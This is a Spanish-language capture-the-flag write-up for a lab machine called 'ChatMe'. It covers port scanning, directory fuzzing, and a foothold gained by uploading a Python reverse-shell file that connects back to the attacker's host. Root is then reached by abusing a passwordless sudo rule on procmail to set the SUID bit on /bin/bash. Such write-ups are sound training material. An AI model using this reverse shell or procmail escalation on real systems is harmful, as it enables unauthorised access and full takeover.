# Enumeracion de puertos, servicios y Versiones

nmap -Pn -n -sS -p- --min-rate 5000 -vvv 172.17.0.2 -oN nmap

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64


nmap -Pn -n -sS -p80 -sCV --min-rate 5000 -vvv 172.17.0.2 -oN nmap2

PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 nginx 1.24.0 (Ubuntu)
|_http-title: ChatMe - The Best Online Chat Solution
|_http-server-header: nginx/1.24.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

si chequeamos el servicio web, obervamos que si clicamos en el logo superior (chatme) nos lleva a http://172.17.0.2/index.html
y vemos el siguiente texto: Welcome mwheeler!!

revisamos un poco mas la web principal y al clicar en [Chat Right Now!] nos redirecciona al dominio [http://chat.chatme.dl/] asi 
que lo agrego al archivo /etc/hosts para poder chequear el contenido y me consigo con un login que solo debo colocar un user
[http://chat.chatme.dl/login.php] y ya accedemos a un chat el cual despues de testear es posible cargar archivos php, asi que 
empezare a fuzzear la web

# Fuzzing Web

feroxbuster -u http://chat.chatme.dl -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x txt,php,html,js,py

â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”´â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
 ðŸ  Press [ENTER] to use the Scan Management Menuâ„¢
â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
302      GET        0l        0w        0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        7l       12w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       71l      157w     1891c http://chat.chatme.dl/login.php
301      GET        7l       12w      178c http://chat.chatme.dl/uploads => http://chat.chatme.dl/uploads/
200      GET      178l      430w     5769c http://chat.chatme.dl/index2.php
200      GET        1l       15w      147c http://chat.chatme.dl/upload.php
301      GET        7l       12w      178c http://chat.chatme.dl/css => http://chat.chatme.dl/css/
301      GET        7l       12w      178c http://chat.chatme.dl/js => http://chat.chatme.dl/js/
=======================================================

en http://chat.chatme.dl/uploads no podemos ver los archivos que cargamos, intente cargar archivos php pero no funciono,
intente bypassear la extension y sin resultados, por lo que tras intentarlo con archivos .py logre el acceso...

1) creamos un archivo .py que ejecute comandos de sistema con el siguiente contenido:

========================================================================================
import subprocess
subprocess.run("bash -c '/bin/bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'", shell=True)
========================================================================================
guardamos con extension .py


2) nos ponemos en escucha con netcat

nc -lnvp 4444


3) cargamos el archivo .py en el chat y esperamos la conexion por netcat


# Escalada

User: System

script /dev/null -c bash 
stty raw -echo; fg
reset xterm
stty rows 38 columns 168
export TERM=xterm
export SHELL=bash
sudo -l

User system may run the following commands on 873c3bad9008:
    (ALL : ALL) NOPASSWD: /usr/bin/procmail

despues de buscar el binario con searchbins y ver que no tiene instrucciones de escaladas,
me toco investigar por internet donde conclui lo siguiente:

1) podemos ejecutar comandos con procmail

para la ejecucion de comandos con procmail, debemos modificar el archivo de configuracion
.procmailrc o en su defecto podemos crear uno, en este caso vamos a crear uno en nuestro 
directorio con el sigueinte contenido:

========================
:0
| chmod u+s /bin/bash
========================

luego de esto vamos a ejecutar el comando {chmod u+s /bin/bash} definido en el archivo de configuracion
.procmailrc de la siguiente manera..

echo 'hola' | sudo /usr/bin/procmail -m .procmailrc

con [echo] simulamos un correo y con [-m] le especificamos el archivo de configuracion a utilizar,
ahora validamos el binario /bin/bash

ls -la /bin/bash
-rwsr-xr-x 1 root root 1446024 Mar 31  2024 /bin/bash

funciono! por lo que solo nos queda escalar privilegios a root

/bin/bash -p
whoami
root
